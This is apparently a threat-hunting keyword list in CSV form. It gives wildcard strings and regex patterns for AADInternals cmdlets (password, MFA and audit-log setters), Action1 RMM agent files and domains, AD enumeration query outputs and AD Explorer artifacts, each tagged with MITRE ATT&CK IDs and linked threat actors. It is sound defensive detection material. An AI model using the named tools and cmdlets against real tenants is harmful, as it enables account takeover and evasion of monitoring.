"*Set-AADIntSelfServicePurchaseProduct*",".{0,1000}Set\-AADIntSelfServicePurchaseProduct.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntSetting*",".{0,1000}Set\-AADIntSetting.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntSPOSiteMembers*",".{0,1000}Set\-AADIntSPOSiteMembers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntSPOUserProperty*",".{0,1000}Set\-AADIntSPOUserProperty.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntSyncFeature*",".{0,1000}Set\-AADIntSyncFeature.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntSyncFeatures*",".{0,1000}Set\-AADIntSyncFeatures.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntTeamsAvailability*",".{0,1000}Set\-AADIntTeamsAvailability.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntTeamsMessageEmotion*",".{0,1000}Set\-AADIntTeamsMessageEmotion.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntTeamsStatusMessage*",".{0,1000}Set\-AADIntTeamsStatusMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntTenantGuestAccess*",".{0,1000}Set\-AADIntTenantGuestAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntUnifiedAuditLogSettings*",".{0,1000}Set\-AADIntUnifiedAuditLogSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntUserAgent*",".{0,1000}Set\-AADIntUserAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntUserMFA*",".{0,1000}Set\-AADIntUserMFA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntUserMFAApps*",".{0,1000}Set\-AADIntUserMFAApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Set-AADIntUserPassword*",".{0,1000}Set\-AADIntUserPassword.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Start-AADIntCloudShell*",".{0,1000}Start\-AADIntCloudShell.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Start-AADIntDeviceIntuneCallback*",".{0,1000}Start\-AADIntDeviceIntuneCallback.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Start-AADIntSpeech*",".{0,1000}Start\-AADIntSpeech.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Update-AADIntADFSFederationSettings!""*",".{0,1000}Update\-AADIntADFSFederationSettings!\"".{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Update-AADIntADFSFederationSettings*",".{0,1000}Update\-AADIntADFSFederationSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Update-AADIntSPOSiteFile*",".{0,1000}Update\-AADIntSPOSiteFile.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Update-AADIntSyncCredentials*",".{0,1000}Update\-AADIntSyncCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/action1_agent(My_Organization).msi*",".{0,1000}\/action1_agent\(My_Organization\)\.msi.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","product name","10","10","N/A","N/A","N/A","N/A"
"*\Action1\7z.dll*",".{0,1000}\\Action1\\7z\.dll.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Action1\Agent\Certificate*",".{0,1000}\\Action1\\Agent\\Certificate.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Action1\CrashDumps*",".{0,1000}\\Action1\\CrashDumps.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Action1\package_downloads*",".{0,1000}\\Action1\\package_downloads.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Action1\scripts\Run_PowerShell_*",".{0,1000}\\Action1\\scripts\\Run_PowerShell_.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\action1_agent(My_Organization).msi*",".{0,1000}\\action1_agent\(My_Organization\)\.msi.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","product name","10","10","N/A","N/A","N/A","N/A"
"*\ACTION1_AGENT.EXE-*",".{0,1000}\\ACTION1_AGENT\.EXE\-.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\action1_log_*.log*",".{0,1000}\\action1_log_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","example C:\Windows\Action1\logs\action1_log_2023-12-17_13-42-47~10328.log","10","10","N/A","N/A","N/A","N/A"
"*\Windows\Action1\scripts\*",".{0,1000}\\Windows\\Action1\\scripts\\.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*_renamed_by_Action1*",".{0,1000}_renamed_by_Action1.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*a1-server-prod-even.action1.com*",".{0,1000}a1\-server\-prod\-even\.action1\.com.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Action1 Corporation*",".{0,1000}Action1\sCorporation.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Action1 Endpoint Security*",".{0,1000}Action1\sEndpoint\sSecurity.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","product name","10","10","N/A","N/A","N/A","N/A"
"*Action1*'DestinationPort'>22543*",".{0,1000}Action1.{0,1000}\'DestinationPort\'\>22543.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Action1\batch_data\Run_Script__*",".{0,1000}Action1\\batch_data\\Run_Script__.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Action1\first_install.tmp*",".{0,1000}Action1\\first_install\.tmp.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Action1\what_is_this.txt*",".{0,1000}Action1\\what_is_this\.txt.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*action1_agent.exe*",".{0,1000}action1_agent\.exe.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*action1_agent.exe.connection*",".{0,1000}action1_agent\.exe\.connection.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*action1_remote.exe*",".{0,1000}action1_remote\.exe.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*action1_update.exe*",".{0,1000}action1_update\.exe.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*C:\Windows\Action1\*",".{0,1000}C\:\\Windows\\Action1\\.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*C:\Windows\System32\config\systemprofile\AppData\Local\Action1*",".{0,1000}C\:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Action1.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Company'>Action1 Corporation*",".{0,1000}\'Company\'\>Action1\sCorporation.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*CurrentControlSet\Services\A1Agent*",".{0,1000}CurrentControlSet\\Services\\A1Agent.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://app.action1.com/agent/*/Windows/*.msi*",".{0,1000}https\:\/\/app\.action1\.com\/agent\/.{0,1000}\/Windows\/.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","https://app.action1.com/agent/{ID}/Windows/agent(My_Organization).msi","10","10","N/A","N/A","N/A","N/A"
"*InventoryApplicationFile\action1_agent.ex*",".{0,1000}InventoryApplicationFile\\action1_agent\.ex.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*InventoryApplicationFile\action1_remote.e*",".{0,1000}InventoryApplicationFile\\action1_remote\.e.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*server.action1.com*",".{0,1000}server\.action1\.com.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused buy attacker","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","#dnsquery","dns request","10","10","N/A","N/A","N/A","N/A"
"*lcmammnjlbmlbcaniggmlejfjpjagiia*",".{0,1000}lcmammnjlbmlbcaniggmlejfjpjagiia.{0,1000}","greyware_tool_keyword","Adblock Office VPN Proxy Server","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/AD-common-queries.git*",".{0,1000}\/AD\-common\-queries\.git.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","1","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*ADUsers-Disabled.txt*",".{0,1000}ADUsers\-Disabled\.txt.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*ADUsers-PasswordNeverExpires.txt*",".{0,1000}ADUsers\-PasswordNeverExpires\.txt.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*ADUsers-PasswordNotRequired.txt*",".{0,1000}ADUsers\-PasswordNotRequired\.txt.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*swarleysez/AD-common-queries*",".{0,1000}swarleysez\/AD\-common\-queries.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","1","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*\Software\MSDART\Active Directory Explorer*",".{0,1000}\\Software\\MSDART\\Active\sDirectory\sExplorer.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*\Software\Sysinternals\Active Directory Explorer*",".{0,1000}\\Software\\Sysinternals\\Active\sDirectory\sExplorer.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*<Data Name='OriginalFileName'>AdExp<*",".{0,1000}\<Data\sName\=\'OriginalFileName\'\>AdExp\<.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*>Active Directory Editor<*",".{0,1000}\>Active\sDirectory\sEditor\<.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*>Sysinternals ADExplorer<*",".{0,1000}\>Sysinternals\sADExplorer\<.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*adexplorer.exe*",".{0,1000}adexplorer\.exe.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*adexplorer.zip*",".{0,1000}adexplorer\.zip.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"*adexplorer64.exe*",".{0,1000}adexplorer64\.exe.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
